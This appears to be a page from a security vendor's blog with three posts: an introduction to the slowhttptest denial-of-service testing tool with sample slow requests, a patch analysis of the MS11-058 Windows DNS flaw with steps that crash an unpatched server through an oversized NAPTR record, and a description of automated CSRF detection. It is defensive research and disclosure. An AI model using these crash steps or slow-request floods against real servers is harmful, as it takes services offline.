Skip navigation
0

Slow HTTP attacks are denial-of-service (DoS) attacks that rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a denial of service. These attacks are problematic because they are easy to execute, i.e. they can be executed with minimal resources from the attacking machine.

 

Inspired by Robert “Rsnake” Hansen’s Slowloris and Tom Brennan’s OWASP slow post tools, I started developing another open-source tool, called slowhttptest, available with full documentation at http://code.google.com/p/slowhttptest. Slowhttptest opens and maintains customizable slow connections to a target server, giving you a picture of the server’s limitations and weaknesses. It includes features of both of the above tools, plus some additional configurable parameters and nicely formatted output.

 

Slowhttptest is configurable to allow users to test different types of slow http scenarios. Supported features are:

  • slowing down either the header or the body section of the request
  • any HTTP verb can be used in the request
  • configurable Content-Length header
  • random size of follow-up chunks, limited by optional value
  • random header names and values
  • random message body data
  • configurable interval between follow-up data chunks
  • support for SSL
  • support for hosts names resolved to IPv6
  • verbosity levels in reporting
  • connection state change tracking
  • variable connection rate
  • detailed statistics available in CSV format and as a chart generated as HTML file using Google Chart Tools

 

How to Use

The tool works out of the box with default parameters, which are harmless and most likely will not cause a denial of service.

 

Type:

 

$ PREFIX/bin/slowhttptest

 

and the test begins with the default parameters.

 

Depending on which test mode you choose, the tool will send either slow headers:

 

GET / HTTP/1.1CRLF
Host: localhost:80 CRLF
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)CRLF
.
. n seconds
.
X-HMzV2bwpzQw9jU9fGjIJyZRknd7Sa54J: u6RrIoLRrte4QV92yojeewiuDa9BL2N7CRLF
.
. n seconds
.
X-nq0HRGnv1W: T5dSLCRLF
.
. n seconds
.
X-iFrjuN: PdR7Jcj27PCRLF
.
.
.

 

or slow message bodies:

 

POST / HTTP/1.1CRLF
Host: 10.10.25.116:443CRLF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) Gecko/20100101
Firefox/5.0.1CRLF
Content-Length: 8192CRLF
Connection: closeCRLF
Referer: http://code.google.com/p/slowhttptest/CRLF
Content-Type: application/x-www-form-urlencodedCRLF
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5CRLF
CRLF
foo=bar
.
. n seconds
.
&rjP8=du7FKMe
.
. n seconds
.
&93zgIx=jgfpopJ
.
.
.

 

Repeated until the server closes the connection or the test hits the specified time limit.

 

Depending on the verbosity level selected, the slowhttptest tool logs anything from heartbeat messages every 5 seconds to a full traffic dump. Output is available either in CSV format or in HTML for interactive use with Google Chart Tools.

 

Note: Care should be taken when using this tool to avoid inadvertently causing denial of service against your servers. For production servers, QualysGuard Web Application Scanner will perform passive (non-intrusive) automated tests that will indicate susceptibility to slow http attacks without the risk of causing denial of service.

 

Example Test and Results

The HTML screenshot below shows the results of running slowhttptest against a test server in a test lab.  In this scenario, the tool opens 1000 connections with rate of 200 connections per second, and the server was able to concurrently process only 377 connections, leaving the remaining 617 connections pending. Denial of service was achieved within the first 5 seconds of the test, and lasted 60 seconds, until the server timed out some of the active connections. At this point, the server transferred another set of connections from pending state to active state, thus causing DoS again, until the server timed out those connections.

 


Figure 1: Sample HTML output of slowhttptest results.

 

As is shown in the above test, the slowhttptest tool can be used to test a variety of different slow http attacks and to understand the effects they will have on specific server configurations. By having a visual representation of the server’s state, it is easy to understand how the server reacts to slow HTTP requests. It is then possible to adjust server configurations as appropriate. In follow-up posts, I will describe some detailed analysis of different HTTP servers’ behavior on slow attacks and mitigation techniques.

 

Any comments are highly appreciated, and I will review all feature requests posted on the project page at http://code.google.com/p/slowhttptest. Many thanks to those who are contributing to this project.

 

 

 

Update, August 26, 2011:

Version 1.1. of slowhttptest includes a new test for the Apache range header handling vulnerability, also known as the "Apache Killer" attack. The usage example can be found at http://code.google.com/p/slowhttptest/wiki/ApacheRangeTest.

 

Update, January 5, 2012:

Version 1.3 of slowhttptest includes a new test for the Slow Read DoS attack.

0
Posted by Bharat Jogi on Aug 23, 2011 in Security Labs

Patch Analysis for MS11-058

In the Patch Tuesday for August 2011, Microsoft released Security Bulletin MS11-058 (CVE-2011-1966) to fix a unauthenticated remote code execution vulnerability in DNS servers. According to the security advisory, a remote code execution vulnerability exists because the Windows DNS Server improperly handles a specially crafted NAPTR query string in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the system.

 

We reverse engineered the patch to get a better understanding of the mechanism of the vulnerability and found this vulnerability can be triggered with a few easy steps. While the proof of concept described below demonstrates a denial of service, attackers with malicious intent may be able to get reliable code execution.

 

QualysGuard detects this vulnerability with QID: 90726 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (MS11-058). Because of the possibility of a code execution attack, Qualys recommends all our customers to scan their environment for QID 90726 and apply this security update as soon as possible.

 

Sample

Unpatched File: dns.exe (version: 6.0.6002.18005)
Patched File: dns.exe (version: 6.0.6002.18486)

 

Patch Analysis

  1. We start the analysis by binary-diffing the unpatched and the patched version of the files that were made available by the MS11-058 security update. This helps us understand the changes that were made in order to fix the vulnerabilities by this patch. To perform binary diffing we use TurboDiff, which is a plugin for IDA pro. TurboDiff shows us a list of all the functions that are identical, changed, unmatched and those that look suspicious. Suspicious functions have unchanged function graphs but changed checksums, which indicates a small code change was made. While most of the functions look identical, TurboDiff lists some of these functions as suspicious (Fig. 1).


    Figure 1: Diffing results by TurboDiff.

  2. As seen in figure 1, TurboDiff lists four of these functions as suspicious. The vulnerability we are investigating is related to CVE-2011-1966, which is related to Name Authority Pointer (NAPTR) DNS resource record. From the names of the four functions marked as suspicious, it is pretty clear the ‘NaptrWireRead(x,x,x,x)’ has something to do with the NAPTR DNS record and this should be the first function to analyze further.

  3. Taking a closer look at the diffing results for the function NaptrWireRead(x,x,x,x) reveals there is only one change made to the entire function (Figure 2, indicated with green box).

  4. The signed extended instruction “movsx edi, byte ptr[ebx]” is replaced with zero extended instruction “movzx edi, byte ptr[ebx]”. This value is then further used as the number of bytes to copy from the source buffer to the destination buffer for memcpy().

  5. The signed extended move instruction is a trouble maker here. If the byte pointed by “byte ptr[ebx]” is greater than 127(0x7F), the resulting value in  the edi register will be a very large number. For example if byte pointed by [ebx] is 128, the resulting value in register edi will be 0xFFFFFF80. The next instruction “LEA EAX, DWORD PTR DS:[EDI+1]” will load EAX with 0XFFFFFF81 which is used as a count for memcpy(). This example will try to copy the entire 4Gb of memory, leading the DNS service to crash.


    Figure 2: Binary Diff for function NaptrWireRead(x,x,x,x).

DOS Proof-of-Concept

  1. For the proof of concept, you need two DNS servers. Register the domain crasher.test.com on the first server and configure a NAPTR DNS record as shown in figure 3 below. The second DNS server will act as a forwarder DNS server. Of all the fields shown, the “Service String” and “Regular Expression” fields are the ones that can take input greater than 127 characters with no restrictions.

  2. To exploit this vulnerability we make any of the above mentioned fields have more than 128 characters. In this case we set the "regular expression" field to 128 characters.

  3. From the forwarder DNS, type the command “nslookup -type=all crasher.test.com. 127.0.0.1”. This command will crash the DNS server working as the forwarder.


    Figure 3: DNS NAPTR form.

  4. To see the vulnerability in action, attach your debugger to the DNS executable and set a break point at the NaptrWireRead(x,x,x,x) function and also set a breakpoint at the memcpy() function in that function.


    Figure 4: BreakPoint at memcpy() in NaptrWireRead().

  5. From Figure 4 (see the values passed on the stack when calling memcpy()), it is clear that setting the value greater than 128 has caused the count parameter for memcpy function to be a really large value causing an access violation and crashing the DNS server.

  6. The call Stack Trace for the above vulnerability can be seen in Figure 5 below.


    Figure 5: Call Stack Trace.

  7. To analyse the crash via windbg, you can start Windbg with the command “windbg -I” an register it as a default postmortem debugger. When you run the “nslookup -type=all crasher.test.com. 127.0.0.1” again, the DNS server crashes and windbg starts for analysis. Figure 6 shows the output of the !exploitable crasher analyzer.


    Figure 6: !exploitable plugin output.

Conclusion

As shown in the analysis above, this vulnerability can be triggered with a few easy steps. While this PoC demonstrates a denial of service, attackers with malicious intent may be able to get reliable code execution. Hence we recommend all our customers to scan their environment for QID 90726 and apply this security update as soon as possible.

0

Interest in the QualysGuard Web Application Scanning (WAS) module has been growing since its new UI was demonstrated last week at BlackHat. Along with such interest come questions about how the scanner works. The ultimate goal for WAS is to provide accurate, scalable testing for the most common, highest profile vulnerabilities (think of SQL injection and XSS) so that manual testing can skip the tedious and time-consuming aspects of an app review and focus on complex vulns that require brains rather than RAM.

 

One complex vuln in particular is CSRF. Automated, universal CSRF detection is a tough challenge, which is why we try to solve the problem in pieces rather than all at once. It's the type of challenge that keeps web scanning interesting. Here’s a brief look at the approach we've taken to start bringing CSRF detection into the realm of automation.

 

First, the test assumes an authenticated scan. If the scan is not given credentials, then the tests won't be performed. Also, tests are targeted to specific manifestations of CSRFrather than the broad set of attacks possible from our friendly sleeping giant.

 

Tests roughly follow these steps. Fundamentally, we're trying to model an attack rather than make inferences based on pattern matching:

 

1. Identify forms with a "session context". This is a weaker version of (but hopefully a subset of) a "security context", because lots of times security requires knowledge about the boundaries within an app and the authorized actions of a user. This knowledge is hard to come by automatically. Never the less, some utility can be had by looking at forms with the following attributes:

  • Only available to an authenticated user.
  • Are not "trivial" such as search forms or logout buttons.
  • Have an observable effect, either on the session or the HTTP response. (Hint: Here's where the automated scan becomes narrow, meaning prone to false negatives.)

 

2. Set up two separate sessions for the user (i.e. login twice). Keep their cookie jars apart. We’ll refer to the sessions as Aardvark and Bobcat (or A & B or Alpha & Bravo, etc.). Remember, this is for a single user.

 

3. Obtain a form for session Aardvark.

 

4. Obtain a form for session Bobcat.

 

5. Swap the forms between the two sessions and submit. (Crossing the streams, like Egon told you not to do.)

  • The assumption is that any CSRF tokens in Aardvark’s form are tied to the session cookie(s) used by Aardvark and Bobcat’s belong to Bobcat. Things should blow up if the tokens and session don't match.

 

6. Examine the "swapped" responses.

  • If the form’s fields never change between sessions, then this is a good indicator that no CSRF token is present. You have to run tests with a browser in order to make sure there’s no JavaScript dynamically changing the form when the page loads or the form is submitted.
  • If the response has a clear indication of error, then the app is more likely to be protected from CSRF. The obvious error is something like, "Invalid CSRF token". Sadly, the world is not unicorns and rainbows for automated scanning and errors may not be so obvious or point so directly to CSRF.
  • If the response is similar to the one received from the original request, then it appears that the form is not coupled to a user's session. This is an indicator that the form is more probably vulnerable to CSRF.

 

What it won't do, because these techniques are noisy and unreliable (as opposed to subtle and quick to anger):

  • Look for hidden form fields with names or values that match CSRF tokens. If an obvious token is present, that doesn't mean the app is actually validating it.
  • Use static inspection of the form, DOM, or HTML to look for any examples of CSRF tokens. Why look for text patterns when you're trying to determine a behavior? Not everything is solved by regexes. (Which really is unfortunate, by the way.)
  • Attempt to evaluate the predictability of anything that looks like a CSRF token.
  • Submit forms without loading the complete page and its resources in a browser; otherwise JavaScript-based countermeasures would not be noticed.

 

Nor will it demonstrate the compounding factor of CSRF onother vulnerabilities like XSS. That's something that manual pen-testing should do. In other words, WAS is focused on identifying vulns (it should find an XSS vuln, but it won't tie the vuln to a CSRF attack to demonstrate a threat). Manual pen-testing more often focuses on how deep an app can be compromised -- and the real risks associated with it.

 

What it'll miss:

  • Situations where sessions cookie(s) are static or relatively static for a user. This impairs the "swap" test.
  • CSRF that can affect unauthenticated users in a meaningful way. This is vague, but as you read more about CSRF you’ll find that some people consider any forgeable action should be considered a vuln. This speaks more to the issue of evaluating risk. You should be relying on people to analyze risk, not tools.
  • CSRF that affects the user's privacy. This requires knowledge of the app's policy and the impact of the attack.
  • Forms whose effect on a user's security context manifests in a different response, or in a manner that isn't immediately evident.
  • CSRF tokens in the header, which might lead to false positives.
  • CSRF vulns that manifest via links rather thanforms. Apps put all kinds of functionality in hrefs rather than explicit form tags.
  • Other situations where we play games of anecdotes and what-ifs.

 

What we are trying to do:

  • Reduce noise. Don't report vulns for the sake of reporting a vuln if no clear security context or actionable data can be provided.
  • Provide a discussion point so we can explain thebenefits of automated web scanning and point out where manual follow-up will always be necessary.
  • Learn how real-world web sites implement CSRF in order to find common behaviors that might be detectable via automation. You'd be surprised (maybe) at how often apps have security countermeasures that look nothing like OWASP recommendations and, consequently, fare rather poorly.
  • Experiment with pushing the bounds of what automation can do, while avoiding hyperbolic claims that automation solves everything.

 

The current state of CSRF testing in WAS should be relied on as a positive indicator (vuln found, vuln exists) more so than a negative indicator (no vuln found, no vulns exist). That's supposed to mean that a CSRF vuln reported by WAS should not be a false positive and should be something that the app's devs need to fix. It also means that if WAS doesn't find a vuln then the app may still have CSRF vulns. For this particular test a clean report doesn't mean a clean app; there're simply too many ways of looking at the CSRF problem to tackle it all at once. We're trying to break the problem down into manageable parts in order to understand what approaches work. We want to hear your thoughts and feedback on this.

Bookmarked By (1)

Actions